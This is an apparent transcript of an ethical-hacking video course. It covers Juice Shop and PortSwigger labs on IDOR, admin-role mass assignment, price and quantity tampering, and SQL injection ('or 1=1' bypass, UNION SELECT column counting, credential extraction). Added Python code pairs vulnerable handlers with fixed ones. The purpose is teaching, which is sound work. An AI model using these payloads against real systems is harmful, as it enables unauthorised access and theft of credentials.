out in the last one and if you did that's awesome and if not you can go ahead and try and solve this Challenge on your own and then we will go through it together so if you want to give that a shot you can go ahead and do that now okay we're going to just open up one of the 
items that already has a review so that we have a name that we can leave feedback under. What we'll do is come over and turn on our intercept and type in some kind of message, and then we will submit. We'll come over here and see if we can find it, and here it is. We can send this to our repeater; you can come over here and send this, and it says it was created. So we have the message and then we have the author, so instead of having our name in here we can put in Bender at Juice Shop, with a dash I think, that is how it was written, and then we should be able to send this. We'll actually just put in something else here and send it, and it says it was created. We'll turn the intercept off, and you can see here it was created under someone else's name. It actually says we have successfully completed the challenge again. Okay, our next challenge is going to be one that we have talked about but we have not actually seen, and I have not come across any vulnerable web apps to actually test this on and show it to you. But we have talked about it, and you might have to use some of your Googling skills, or if you get stuck, follow along with the video and get a hint before you move on. We're going to create an admin account, and this is something that is very possible that you will come across. It's not very common, but it does happen that you can find ways to create an admin account or escalate your privileges. So we're going to go ahead and make sure our intercept is off, and what I need you to do is go ahead and create an account and see if you can figure out how to get the account enrolled as an admin, so you can go ahead and try that now. I think what I will have to do is log out, and I'm going to make a new account just the same. I will come in here and go "not yet a customer"; this time we'll go john@john.com, and as soon as you get this done we will turn on our intercept and we will register the account. Now what we're going to do here is we're going to send this
to repeater, and over here is where we'll work on escalating the privileges to an admin. So we'll send this, just to get a response to see what we have here. Our role is a customer, and this tells us that we're going to need to change the role. I actually just did this a few hours ago; I was just working through the application, and I'm going to show you exactly what happened to me, because this will give you a really good idea of just the trial and error that we go through when we're testing an application. So I came in here, I typed in role just like this, and I typed in admin. If you send it, since this user has already been created over here, we're actually going to have to change this to one, and if we send it we can see we've now created another user, but the role is still customer. So I changed this to administrator, and it still didn't work, so I tried to change this to user admin and then changed this over here again, and we are still a customer. I've tried user, I tried admin, I tried administrator, and finally what happened was I deleted this and I came up here and tried to just move our input to see if that would make a difference. I typed in admin just the same as before, and that looks good, and we'll change this to a 3 and then we will send it, and now you can see our role is now admin. So we have created an admin user. If you take this user with this password that you just made, you can log in and browse the Juice Shop application as an admin. You'll actually see things like this in the wild. They're uncommon, but you can actually go on HackerOne and read the activity and see where people have actually got this to work; just read the articles and read the submissions to observe how people have pulled this off. Some of them are going to be more complicated than this, but some of them really will be this simple. Okay, what I need you guys to do for this next lesson is go ahead and open up a new tab, and up here we're going to go to
PortSwigger. You can go ahead and search for it; it should be the first one. We're going to open it up and move over to the login button. I've already created an account, so go ahead, click on login, create an account; we're going to need it, especially in the coming lesson. So go ahead, click the login button, make an account, and I'll see you once you're logged in. Okay, once you have reached your login page, go ahead and click on Academy and then go to all labs, and once this loads we're going to scroll down until you find business logic. I believe it's pretty far down in all of these labs, so scroll down to our business logic vulnerabilities right here; we're going to be working through these right here, and so let's continue going forward. These actually say solved because I already made the videos for these, and I realized that I never actually explained how you guys should get here and get to these labs before I started filming these videos, so I'm going to edit the video and these are going to turn into unsolved. Okay, we are going to look at a few business logic vulnerabilities. These are very similar to the IDORs that we have been looking at, so we're going to go ahead and start here with this one right at the top. You can go ahead and click on it, and we can look and see what exactly they have for us. It says that it doesn't validate user input and we're to buy this lightweight jacket, so you can go ahead and open up the lab, and this is where it brings us. It said we needed to log in, so we will go ahead and do that; it gave us the login credentials, so we'll log in, and now we're supposed to buy this jacket. So I guess we can go ahead and view the details and add it to the cart. Let's actually come in here, turn the intercept on, we'll add it to the cart, and it tells us our price right here. I don't know exactly how much we're allowed to spend, but I think we should be able to, let's see if we can make
this a negative number. We'll go ahead and forward that and then we'll just turn that off, and it did not add it to our cart. We have a hundred dollars to spend on this jacket, and this jacket is way over a hundred dollars, thirteen hundred dollars. So we'll go ahead and see if we can turn the intercept on, add this to cart, and let's just change our price here and see if that works. Okay, we were allowed to add it to our cart, so we have no need to apply a coupon, and we should be able to place our order, and it says we have solved the challenge. So things like this, business logic errors, IDORs and business logic errors, are going to be things that you have the opportunity to find. It's pretty common that you'll find these business logic vulnerabilities; they happen when developers get lazy or they're just not really paying attention to what they're doing. I've actually seen really advanced developers make very simple mistakes that made their web applications vulnerable just because they weren't paying attention. So you can find these; they're pretty common. I know there's at least one bug bounty hunter that this is all they do: they look through Burp, or they look for business logic errors and what they can change, just to find stuff that they shouldn't be able to, and vulnerabilities. These are pretty simple, and they do take a long time to find, but you can find them just by doing really simple things, by just changing numbers and inputs. Sometimes you will find stuff that has been encoded. It'll say, like, you'd have the lightweight jacket, let's actually go back, I'll just show you. Sometimes we will add things to our cart like this, and you would have this, it'd say price, and it would look like this instead; we'll encode it base64.
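The forged feedback, the admin-role registration and the price tampering in these labs all come down to the same defect: the server trusts fields that arrive in the request body. The following is an added example, not code from the course, from Juice Shop or from the PortSwigger labs: a toy Python shop in which each vulnerable handler sits next to its hardened version. The users, products, prices, the session user and the base64-encoded price value are all constructed for the example.

```python
import base64


class Shop:
    """Toy stand-in for the server side of the apps in the labs (constructed data)."""

    def __init__(self, logged_in_user_id):
        self.users = {1: {"email": "john@john.com", "role": "customer"},
                      14: {"email": "bender@example.test", "role": "customer"}}
        self.products = {1: {"name": "Lightweight jacket", "price": 1337.00},
                         4: {"name": "Pool", "price": 100.00}}
        self.session_user_id = logged_in_user_id   # who is really logged in
        self.feedback = []
        self.basket = []

    # --- IDOR: feedback stored under whatever UserId the client sent ----------
    def vulnerable_feedback(self, body):
        """Trusts the UserId field in the request body."""
        self.feedback.append({"user_id": body["UserId"], "comment": body["comment"]})
        return self.feedback[-1]["user_id"]

    def safe_feedback(self, body):
        """Authorship comes from the server-side session, never from the client."""
        self.feedback.append({"user_id": self.session_user_id, "comment": body["comment"]})
        return self.feedback[-1]["user_id"]

    # --- Mass assignment: registering straight into the admin role ------------
    def vulnerable_register(self, body):
        """Copies every submitted field, so an extra "role": "admin" is honoured."""
        uid = max(self.users) + 1
        self.users[uid] = {"email": body["email"], "role": body.get("role", "customer")}
        return self.users[uid]["role"]

    def safe_register(self, body):
        """Allow-list of client-settable fields; the role is always server-assigned."""
        uid = max(self.users) + 1
        self.users[uid] = {"email": body["email"], "role": "customer"}
        return self.users[uid]["role"]

    # --- Business logic: client-controlled price and quantity -----------------
    @staticmethod
    def decode_price(encoded):
        """Prices sometimes travel base64-encoded; decoding them is not validation."""
        return float(base64.b64decode(encoded).decode())

    def vulnerable_add_to_basket(self, body):
        """Uses the price and quantity the client sent; negatives become a credit."""
        pid = body["ProductId"]
        price = (self.decode_price(body["price"]) if "price" in body
                 else self.products[pid]["price"])
        self.basket.append({"product": pid, "qty": body["quantity"], "price": price})
        return self.basket_total()

    def safe_add_to_basket(self, body):
        """Price is looked up server-side; quantity must be a positive integer."""
        pid, qty = body["ProductId"], body["quantity"]
        if pid not in self.products:
            raise ValueError("unknown product")
        if type(qty) is not int or qty < 1:
            raise ValueError("quantity must be a positive integer")
        self.basket.append({"product": pid, "qty": qty, "price": self.products[pid]["price"]})
        return self.basket_total()

    def basket_total(self):
        return round(sum(item["qty"] * item["price"] for item in self.basket), 2)


def demo():
    """Replays the tampered lab requests against both versions and returns what each accepted."""
    encoded_price = base64.b64encode(b"-1337").decode()      # constructed tampered value
    vuln, safe = Shop(logged_in_user_id=1), Shop(logged_in_user_id=1)
    results = {
        "idor_vuln": vuln.vulnerable_feedback({"UserId": 14, "comment": "hello world"}),
        "idor_safe": safe.safe_feedback({"UserId": 14, "comment": "hello world"}),
        "role_vuln": vuln.vulnerable_register({"email": "x@example.test", "role": "admin"}),
        "role_safe": safe.safe_register({"email": "x@example.test", "role": "admin"}),
        # two jackets at quantity -2: the basket total goes negative, as in the lab
        "qty_vuln": vuln.vulnerable_add_to_basket({"ProductId": 1, "quantity": -2}),
        "price_vuln": vuln.vulnerable_add_to_basket({"ProductId": 4, "quantity": 1,
                                                     "price": encoded_price}),
    }
    try:
        safe.safe_add_to_basket({"ProductId": 1, "quantity": -2})
        results["qty_safe"] = "accepted"
    except ValueError as err:
        results["qty_safe"] = str(err)
    results["basket_safe"] = safe.safe_add_to_basket({"ProductId": 4, "quantity": 1})
    return results
```

Running `demo()` shows the vulnerable side recording feedback for user 14, creating an admin and producing a negative basket total, while the hardened side takes the author from the session, ignores the submitted role, prices the item from its own catalogue and rejects the negative quantity. The base64 price is there to make the point from the video concrete: an encoded value is still client input, and the fix is to not read the price from the request at all.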
You'd have this sitting inside your price instead of that number, and so what you have to do if you see something like this is take this and come to your decoder, or you can go to CyberChef, and you can put it in and try and decode the price. You're rarely going to see it where it's just a plain number; but this is way more common, that you would just see a number here, and that you would have to decode it. Sometimes these prices will be stored in places other than just something plain and simple like this, so it's something that you're going to have to look for and poke around. They do take a while to find, but you can find them right off as a beginner who knows very little. We're going to look at one more, and then I want to send you off on a challenge and see if you can find a business logic error on your own. Okay, we are going to continue with the business logic vulnerabilities. We're going to go ahead and open up this second one, and after this one I'm going to set you loose on a challenge. So what we'll do is go ahead and open this up. It looks the same as the one before: we need to buy this jacket, and we have our login user right here, so we'll go ahead and log in and try and proceed with buying the jacket. Okay, here's our jacket, so we'll go ahead and view details, we'll add it to the cart, and we're going to do the exact same thing we did in the last one, the exact same way, by starting out... oh, we don't have a price. So we've got our product ID, our product, and here's our value. Let's get two of them, and I'm assuming we have the same amount of money in our cart as we had the last time to spend. So we'll go ahead and just put the negative sign in front of the two, and we'll see if it allows us to put in a negative number, and we were. So in our cart, if we go look at it, it says we have negative twenty-six hundred dollars. That means they are going to pay us. Let's see if it'll go down by using these buttons. It does, so you wouldn't
even have had to have done this in Burp; you could have just come over here and clicked this button, and it means they're going to pay us this amount of money. So when we place our order we're definitely going to be able to buy our jacket, and our store credit is going to increase. Our price is not allowed to be less than zero, at least they have that in place. So we'll go ahead and... okay, that made our cart empty. We're gonna have to go back and put that back in our cart. So what I think we'll do is add this to our cart as well. I'm not sure how many of these we're going to have to add; we'll go ahead and add one in so that way we can buy our jacket, because that is our challenge. We'll go ahead and make sure that's negative, forward, turn that off, and now we should have two negative items in our cart. It has to be above zero but less than a hundred, so what we can do is just continue to subtract these, oh, we'll add these, we'll go ahead and add these until we hit our price. Okay, it went back to zero and removed it from our cart, so we'll go back over here. Let's find something a little more expensive so we don't have to add that so many times. We'll go with the pool, come to Burp, turn our intercept on, and this is exactly how this would happen if you were testing it; it's just going to be a lot of trial and error. We're going to need, I might guess, at least 15 of these. We'll just go ahead and add them to the cart; we don't need to intercept that. Go back to our cart, and there, our total is now 76 dollars. So what we did is we just added 15 of these pools, which got us close to fifteen hundred dollars, or yeah, 1500, and then what we did is we went ahead and added our jacket in at a negative price, because it wouldn't let us purchase anything at a negative number and we only have a hundred dollars to spend. So this should solve the challenge this time, so we'll go ahead and place our order. I just wanted to add that you saw me make a lot of mistakes and a lot
of trial and error in this video, and I want to thank you for being patient, but I also decided not to edit out all the clicking that I had to do and the failures from this video, because I wanted you to see what it's realistically like as you test web applications. As you're on the hunt, you will be doing what I just did the majority of your time: just trying to see if things work, and as they fail you just go on and try something new and try a different way to exploit the application or the vulnerability. So I want to just encourage you that as you become frustrated or things aren't working, just keep pushing on and see if you can find that vulnerability. Okay, it is time for your challenge. So if you navigate over to Juice Shop and get it running, what I want you to do is try and solve the challenge where you actually are getting paid two or three or four hundred dollars or more from this application. We just worked through two labs that are similar to this, so you can go ahead and try and solve this challenge, and when it's done you should get the green bar at the top of your screen; it'll tell you that you have completed the challenge. So I want you to go ahead and pause this video and give that a try. Okay, how did that go? We're going to go ahead and walk through this in the same manner in which I would solve this. So go ahead and add something to your basket, and then we'll check our basket, and at this point what I would do is turn the intercept on and walk through the whole checkout process and see if there's anywhere that I am able to modify this in any way, shape or form. What I think I'm going to do is, I don't actually want to walk through and have you watch me put all that information in just to solve this challenge, so we'll go ahead and see if we can actually modify this before we get there. So it says we have basket ID 5, we're buying product number 4. Let's see if it will let us do
what we did in the previous challenge and put in a negative amount. Let's try 99, turn the intercept off. It says we were able to add those to our basket and they're going to pay us... ah, that didn't work. Okay, they're gonna pay us if we do that, so we'll go ahead and try that again; 100 wasn't enough. So we'll come back to our products, we'll add to our basket, I forgot to turn Burp on, we'll add this to our basket, forward, forward, here's our quantity. I wonder if the rest of our contents are at the end of this string... well, we have our quantity, so what we'll do is type in negative and we'll do 200 this time, and we'll forward that and go to our basket, and that's more like it: we're going to get paid 400. So what you do at this point... For the next few minutes I'm going to show you a little bit of a walkthrough and explain SQL injection from the Notice website, and I don't want you to actually go there or try and do this walkthrough. We're going to have plenty of practice when I have you create an account with PortSwigger and we walk through the PortSwigger SQL injection labs. So for just the next few minutes, as we go through the Notice example, I'm... and then I'm going to show you what the code actually looks like in a MySQL database. I actually wrote a React app that's hooked up to a Node.js backend with MySQL as the database, so you can kind of see what the code looks like, not that you need to memorize it, but it might help a little bit. Then we are going to move from there into PortSwigger and try to walk through the SQL injections together. So for the next few minutes, as I am on the Notice website, just try and follow along and maybe catch a few nuggets of detail to understand, and then as I walk you through the actual back end of a SQL database, I hope that you can understand it and maybe even do a few of the PortSwigger walkthroughs with me, and then come back and watch the MySQL database explanation again, and hopefully it will begin to click. This is one of
those attacks that is really, really common, and so it's something that you should know. Up front, I'm just going to tell you it might take you watching this and going through these labs several times to fully grasp the SQL injection, but that's okay; it takes time to become an ethical hacker. So with that, let's jump into it. Okay, we are going to begin working through some SQL injection. This is something that you can find; there are bug bounty hunters that dedicate their time only to looking for SQL injections. So if this is something that you find interesting, you can become really proficient at it, and this can be something that you primarily search for. This is something I suggest learning, and learning well. It's easy to look for; you don't really need to know a whole lot about SQL databases in order to find these, but it does help. In the bug bounty world it's actually a lot easier than if you find these on a capture the flag, because all you have to do is put in a time delay to have a proof of concept, but in a capture the flag you'll have to know a little more than what we're going to go over here. For the sake of not going through and learning how to program SQL databases, which I think would take just too much time, we're going to go through how to find these if you were to start looking on bug bounty programs. I went ahead and opened up Notice 15.
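To see why a lone quote produces the server error, why `or 1=1` followed by a comment logs you in, and what the `union select null, null, null` column counting from the MySQL Workbench demo is actually doing, here is an added example that rebuilds the demo's login query on an in-memory SQLite database. It is not the course's React/Node.js code; the table, its two users and their passwords are constructed for the example, and the line comment is `-- ` because SQLite does not treat `#` as a comment the way MySQL does. The parameterised `safe_login` is the fix a developer would ship.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the users table shown in the MySQL Workbench demo."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "s3cret"), (2, "bob", "hunter2")])
    return con


def vulnerable_login(con, username, password):
    """The demo's query built by string concatenation: the input becomes part of the SQL.
    Returns the rows found, or the database's error text when the query breaks
    (the equivalent of the 'error in query' / internal server error in the video)."""
    query = ("SELECT * FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    try:
        return con.execute(query).fetchall()
    except sqlite3.Error as err:
        return "error: " + str(err)


def safe_login(con, username, password):
    """Parameterised query: the values travel separately from the SQL text, so a quote,
    an OR 1=1 or a UNION in the input is just data and cannot change the query."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return con.execute(query, (username, password)).fetchall()


def count_columns(con, max_columns=8):
    """Column counting with UNION SELECT NULL,NULL,...: the first count that does not
    produce an error equals the number of columns the original query returns.
    The trailing '-- ' comments out the rest of the server's query; MySQL also
    accepts '#', which is what the demo used."""
    for n in range(1, max_columns + 1):
        payload = "x' UNION SELECT " + ",".join(["NULL"] * n) + "-- "
        if not isinstance(vulnerable_login(con, payload, ""), str):
            return n
    return None


def demo():
    """Runs each probe from the demo against the concatenated and the parameterised query."""
    con = make_db()
    return {
        "single_quote": vulnerable_login(con, "'", ""),          # breaks the query: error text
        "or_1_eq_1": vulnerable_login(con, "x' OR 1=1-- ", ""),  # every row comes back
        "columns": count_columns(con),                           # 3 (id, username, password)
        "safe": safe_login(con, "x' OR 1=1-- ", ""),             # []: treated as a literal name
    }
```

The `x'` at the start of each payload closes the string the server opened, exactly as the single quote in the video does; everything after it is parsed as SQL, and the comment swallows the `AND password = '...'` tail so the password never matters. With `safe_login` the same strings return no rows, because the driver never splices them into the query text.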
You don't have to go through this or work through this; I'm only going through this to show you what it's going to look like, and then we're going to actually go over to PortSwigger and work through their practice SQL injections. So just to give you an idea of what we're doing: when you come to a login form such as this one, one of the best things you should do, and you should regularly check for, is just to put in a single quote, and then you would hit enter and see what happens. It says this user does not exist. What we're looking for is an error in the query, so I would go and do a double quote next, and I would hit check existence, and if you can hit an error, this is what we're looking for. I'll actually show you in Burp, because this is where you're probably going to be sending your request through. So you'll hit check existence, you would send this to your repeater, and I'm actually just going to go ahead and change this so you can see it, and then you would hit send, and it says we get an error in query. What we're going to see here in a little bit is this be a 501 internal server error, and that's usually what you'll see as you start finding these, but you will find what is called a blind SQL injection; we're going to look at those a little bit later. So we still have the error, so what do we do with the error? We're going to start the enumeration process, but we're actually not going to do that here. I just wanted to show you kind of what we're looking for here, so that you can look for it on your own in the first PortSwigger lab and see what you can find, if you can find it on your own. But just to give you a little more of an idea of what's going on in the background, the SQL database and the SQL language is going to look something like this: select all from users, this will be where username equals, and this is what we input right here. So this would be our input. So what we did is we took this, this is what it'll look
like, and this is what we can put in here. So you'd put your single quote or your double quote, and in the case of the Notice web application what it has is something like this, and then here's where you're putting your query, where you're putting in to see if the username exists. So when we put in another double quote, what happens is you break the query, and this produces the error right here, because it doesn't need to be there; it shouldn't be there in order for this to work in programming, and so that's how you break it. Okay, what we're about to go over is going to be a little advanced, but I think it will help you visualize what's going on beyond what I just showed you in the last video. So what I have up is actually MySQL Workbench. We have here just a simple database; username, I was testing, here's an actual username and password. This is what a table will look like, and so in our query we have select all from users, which is our schema, and then the table, which is users; that's not a capitalized letter here. So this is what a table looks like, and what's going to happen is this is running on a server, and when we send a query to the back end of a web application it will reach out to the server and see if our query is true. So I want to pause here, because, so this is an update, I want to pause here and explain something a little better that I noticed I didn't do a very good job of. When you make a query to a database, the whole reason I wanted to show you the Workbench is so that you could see these are the tables. So if I came over here and I said select all from blog post, then we're going to be grabbing the tables from inside the blog post. When we look at this select all from users, this is showing all the databases, so this is a database, this is a database, and we're selecting from this database right here the users table. So the first one that we see right here, this is the database, and this is the table within the database. So select all from a database and
then a table. This will be really helpful in the future when we learn to run sqlmap and we need to know the context of sqlmap. So this is what it will look like, the code will look like: we have our database, and we're querying our database, and we are selecting all from the users table where the username equals, and then you can just pretend this is blank, because this is where our input is going to go in here. So we're selecting all users from the table where our input is, and the password is equal to the other input. This makes sure that we have an actual username, and then it makes sure we have a password that matches our username and our password from our table. What this looks like is, over here we have our login, and if we type something in and we type in a password and we hit log in, it's going to say wrong username/password, and if we come in here and we actually have our actual login made, it'll say we are logged in. So when we do a SQL injection, basically what we're doing is sending in a request that we decide what it's going to be to the database, or the back end of the website; it reaches out to our database server. So this is a pretty simple SQL injection that we're going to be covering here, and we're going to be going into union select statements after this video, which I think are more common than what we're about to go over, and so it's very important to learn the union select SQL injection statements. There are some bug bounty hunters that dedicate all of their time only to SQL injection, so I just made this, I'm shooting this video because I really want you to understand what's going on, and it'll make more sense. Don't worry if it doesn't make sense right now; you may have to come back to this video more than once and go over the union select statement labs on your own, and then come back to them after a day or two and just continue practicing them until you really have them down. So one of the things that we're looking for
when we do a SQL injection is, I'm going to inspect this so you can actually see this happen; we're going to have our console up. Ignore my errors, because my code is not perfect. When you put in a single quote it will break this right here, and it will crash our server. So if we go ahead and throw that in, you see our connection is refused, and if you come over here you can see our application has crashed, which means I need to restart it, and now our applications are running. So when you send that, you'll have an internal server error, which is what we essentially just got right here. How we get past this is by actually giving it a statement that is true, so that it will give us back the first character, the first login in the database; it'll give us back the first username and password. So we're going to make a true statement right now. What we'll do is we'll just throw in, it doesn't really matter, and then our single quote, and then we'll have or one equals one, and then we comment out everything after that, and then our password doesn't matter either, and it says we're logged in. But if we just have this right here, it'll tell us that we're not logged in, because this isn't correct. So if we have this in here, what we're saying is, is this username right, is this a true username? And the answer is no; you see we have wrong username and password. But one equals 1 is always true, and then we comment everything out after this statement with this hash, so our password doesn't work. So you see how this is all in one line of code; this is all getting run together, it's making this query all together, and what we're doing is essentially commenting out everything after our username, so the password doesn't even matter. So when I say we comment something out, we're commenting out everything after our statement. We throw this hash in here and everything after it is commented out, the password, it doesn't matter. I think we can get by with no password
because I don't have it set up right now that you have to have any characters in here, and it will come back as true. This is what I'm talking about when we say SQL statement and we're querying a database or a server. Okay, there is one other thing I really want to show us. We're going to go over this again, exactly what I'm showing you right now, in another couple of videos, but I think it'll be helpful to see it. So one other thing is, whenever you give a database a true statement, it's going to come back without an error, or saying it's logged in; it's going to come back as true. So we just saw the statement that looked like this: we had our username, and then we had or one equals one, and one equals one is always true, and so it comes back as logged in, or it comes back as true. There are other things we can do to get information from a database. See, we want these usernames and passwords, and we have an ID, so we have three columns here that have information in them. Let's say we know the table is users and we want to know how many columns we have. What we'll do is pull down something true; if we want to pull down the number of columns, because we don't actually know how many there are and we want to just find out some information from this database, you can actually come in here, just like we did before, put in our random username, it doesn't really matter, and then this is what I mean when I say a union select statement. So we're going to connect union to our statement here, so we have select all from users where username equals these things, and then we're going to add to it; we want to add a union select, I can spell, we're going to select null, and this will tell us: is there one column in our table? And if we send this we're going to crash the server. I'll go ahead and send it so you can see we crashed the server. I have to come over here, restart the server, and then I'm just going to give you, there's three columns, we know there are three columns, so we'll throw in null
two more times, and this will say union select null null null, which is going to pull down how many columns there are. If we send this, we crashed the server, because we didn't comment out the rest of the string that we were creating. So here we go, we'll log in, now we have undefined come back, which means we have no errors, so we'd know there are three columns. This is going to come up in one of our very first SQL injections that we're going to be doing on the PortSwigger web application, and they're labs that they have set up for us to practice on, and feel free to continue practicing in there. But this is something we're going to be doing, and we're going to be going into a lot more detail, and you'll have to pay attention to this comment, because it will change between two dashes, without the semicolon, based on the type of database that we're using. So I do apologize if this seems confusing; hopefully it becomes more clear. It's in the top 10 most common vulnerabilities, I think it's in the top five most common vulnerabilities. It's looking a little difficult right now because you've never seen it before, but by the end of this module in the course, if it's still unclear, you can go back and try it again and go back through this module, and it will become more clear, and you will memorize how to find these vulnerabilities. So with that, I will see you in the next video. Okay, we are here on portswigger.net. You can go ahead, I actually went ahead and logged in and created a new account; you can come in here and come up here, click sign in, and then create a new account. Once you've done that, come back to the website and you will go to Academy; you can go ahead and click that, and it'll load up, and then you'll go to all labs, which will take us to some of the labs we're going to be working through, and the SQL injection. If you are having a hard time finding this exact URL right here, I will put a link to it in the description, or you can just type this out in
order to get to all the labs. There's a whole bunch of them; we're not going to be going through all of them, because some of them get kind of repetitive, and it has been a while since I have done these, at least a year. So I actually thought what would be good: I'm not going to rehash any of these before we go through them, so you are going to see me make mistakes, and you'll get to see my thought process, and you'll kind of just get to see how I work through these. So if you want, you can go ahead and open up the first one, and then I like to open it up in a second tab over here. They'll give you some instructions and kind of tell you what you're looking for here; they'll actually tell you where to find some of the SQL injections, so you don't have to spend your time clicking through the whole web application and trying to figure out where things are. They kind of point you in the right direction, and so we're looking for a SQL injection with the union attack. So what this looks like, let's open this back up: this is what their side of the query looks like, and then we will be typing in, you'd close it off, in our case it's going to be a single quote, union select, and then we're going to be looking for the number of columns and what we can find within this vulnerability. So we come over here, and it says find the number of columns returned by the query, and there's a couple of ways to do this. I think I'll show you both; I think they both work in this program, and you can decide what works best for you. So you can come in here, and I actually want to first give you a chance. I'll show you kind of what we're looking for and see if you can find it on your own. So you can come in here, send one of these to your repeater, and see if you can find the SQL injection without any help, and it's okay if you haven't; we really haven't covered this a whole lot, but in the coming videos we'll be able to do this multiple times over and over, and so you'll get the hang of what
we're going through and what we're looking for. Okay, I'm going to send this to the repeater. I'm not actually sure where the SQL injection is even at; I think we'll try right here. Okay, that's what we're looking for; it is going to be right here, and so we're looking for this right here. This is what I was talking about in the last video, the internal server error. If you can produce this error, what you should immediately be thinking is there's going to be a SQL injection here somewhere. It is here somewhere; you just have to figure out how to exploit it. What the challenge actually tells us to do is, we're looking for the number of columns returned, and so we're trying to figure out how many columns are on the specific table. If you think of an Excel spreadsheet, you have rows and then you have columns, and what we're trying to do is figure out how many columns exist on the table. When you're doing a SQL injection, we're going to be looking for passwords as we go through the PortSwigger program, but there are a lot of other things you can look for, and we're going to get to those and exactly how to find them. Even though you're never really going to pull down actual information on a bug bounty program, I wanted to walk through, as someone who doesn't know how to program in SQL, what to do if you come across a capture the flag and you're trying to find specific things such as usernames or flags or passwords, and so we'll get to that in the coming videos. But now we have produced this internal server error, and so we know we are looking for the number of columns using the union attack. So we have our single quote, which breaks the query, and then we type in union, and because we are sending this request we have to send a plus for the space; if you don't have the plus in there and you actually put a space in, it will break what we're trying to send. So union select, and then you put in here null, which is just nothing, and then you send it, and it comes back with nothing, and then you just
hit comma and then you would put in null and you'd send it and it still sends us an error so we put in null again and we send it and oh you know we forgot to do was you have to close out the rest of the query so in here we have to put a dash dash so that comments out everything after our statement here so and then we'd come over here and we'd put in null again and it still says we have found the number of columns and so it hit on the number three it came back okay so this statement would be true so when the statement is true it'll send us back a response and so we have our response which means there are one two three columns inside this lab we're working on and so as we come into the next one we'll read the instructions and we'll work through it what I would like for you to do is go ahead and open up the second lab and click access to the lab and I want you to go in here and do exactly what we did last time and see if you can remember how to find the number of columns in a SQL table so you can go ahead you can open that up see if you can find it and then if you want to try and figure out how to find the columns containing text you can Google around and see if you can figure it out if not we're going to work through it now and you will have the opportunity to practice finding columns containing text as well as continuing to find the number of columns in a table in the future so this isn't your only chance to try and practice this on your own okay if you were able to pull down the number of columns then you have figured out or learned what we went through in the last lesson but if not we're going to go ahead and work through this one again so we'll come in here click on one of these tabs and we'll have a request sent a get request and then we will take it and send it to repeater see if we can find a an internal server error might not actually be in this one there it is it's in this one so we'll send this to repeater and put in our single quote there is the error so 
this is where our injection is going to be and so if you weren't able to find it you can go ahead and from here and see if you can solve the challenge and pull down the number of columns in this lab so you can go ahead and give that a try now what we do here if you remember is we type in Union and our plus then we select and then we have our Plus and then we type in our first null value for the column and then we comment everything else out after the request is sent and it says we still have an error and so we try this in you actually don't have to have these in all caps it's just kind of common practice for what people usually do is have things in all caps I'm not really even sure why so if you know why you can go ahead and let me know so we found we pulled this down we found one two three columns and so if you made it this far good job congratulations you have learned how to pull down the number of columns but now we're supposed to pull down on which column has text or which ones take text and so you would put in your single quotes and then you put in a string and then send it and that one came back as an error so we'll try the next column and it is the second column contains text and we'll go ahead and try the final column as well whoops okay so it would be the center column is the one we would go after to try and pull down information which is not actually available in this lab but it is going to be available in the coming Labs so in the next Lab I want you to try and go through this find the category of where you're going to find your error and then try and pull down Union select the number of columns which column contains text and then we'll work through how to actually pull down the information from that column all right I did not notice after I had closed the video that the lab still said it was unsolved and for those of you that is bothered when a lab goes unsolved where you want to see them all solved I'm going to go ahead and do that now so we'll go 
ahead and I'll show you where to find that if you want you can go ahead and try and find find it I actually think this is a good challenge I think you'll be able to find it just go ahead and go into perform the SQL injection find the one that contains the a string and then look through the response and read through it and see if you can find the answer to solve the challenge this here solves the challenge for you so now the challenge is solved and I will see you in the next lesson okay we are back with the third SQL injection challenge you can go ahead and click on it and read through the prompt I'm actually going to give you the challenge to see if you can pull down which column or columns contain characters and we'll accept a string and then I'm going to walk you through pulling down data from the table and then I would suggest practicing so after we go through it on this lab to try and go through it again without the video before you move on to the next lesson so that you can continue practicing things as you see it happening so we'll go ahead and enter into the lab and it's going to be pretty much the same so if you want to go ahead now I'm going to wait a few seconds and you can pause the video and see if you can complete the challenge and pull down which column or columns contain a string before we go ahead and continue learning how to enumerate the table columns so by now this should be pretty familiar to you we're going to come in here we're going to look for our request that I apparently passed we'll send this to repeater we'll make sure that we get our internal server error and then we'll try our Union select attack and send it and see how many columns we pull down so there's only two in this lab so what we'll do now is we're going to pull down information from the table so I'm going to show you how to do that then I'm going to give a an explanation of the best way if you don't know any SQL or you don't know how to write any SQL statements how to find 
table names if you find this in a capture the flag and you don't want to go through the long process of trying to figure out the table names through writing SQL statements but before we get there I'm going to show you this is what we'll what we'll do we have two columns you'll see check to see if they'll accept a string and that one does I'm gonna go ahead and leave it and that one does as well that means there's both these columns have information within them and let's say there was a third column if we were to write our SQL statement we would have to include all three columns because the query has to be considered true you would just leave the the null statement in here and we're going to see some of these in the coming videos and just to give you an idea that you can go ahead and try and do these you do null Plus the username see this is what you have to do leave this as an empty column but in our case we don't have three columns so we're going to just go with the ones that we do have and the ones that will accept a string and so we're going to pull down usernames and then we're also going to look for the passwords in the table so we look for the password and this should pull down for us the username and the password from the users table and see this looks like a user this looks like a password this looks like a user this looks like a password and this would be the administrator this would be his password so in a response we have pulled down the usernames and the passwords that are within the table and this would give us access if we wanted to you could log in as these people if this was a real website you would have access to their accounts you can go ahead and turn your proxy off so that the web page loads and then you will have the usernames here and the passwords and you can come over to login and you can give them a try and see if you're able to log in and see if this solves the challenge there that one solved the challenge for us so with that I want you to 
go ahead and see if you can figure out the next challenge without any help see how far you can get and if you can make it through we're going to skip over this fourth lesson and we're going to jump into the fifth lesson and you can go ahead and open this up and read through it this time we're going to be in an Oracle database and so we're going to be trying to pull down the version that it is running and so with this tip we can see there's a built-in table called dual so they actually give us the table name this time for us to run through and I think with what you've learned so far and the SQL injection cheat sheet you should be able to figure out how to solve this challenge so if you want to go ahead and pause the video now and try you can go ahead and do that if not we're going to walk through the solution together so we'll open up the page we'll go ahead and turn our proxy on and this should all be familiar to you by now so we're sending that to repeater we make sure that we get our internal internal server error and then we move on just like we have before so we type in Union select and then we'll check for a single column but if you remember the table name we were told is called dual and so we can send that and we still have an error so let's try for a second column and we see that there are two tables or two columns and the table name of dual so we'll come in here and make sure they receive they can receive a string and they can so what we'll do now is we're looking for if you remember the version name we're trying to pull down the version name inside the response so we'll come back to a burp and since these can receive string we type in here banner and then if you remember from the previous lesson if we have multiple columns they can receive a string and we're not 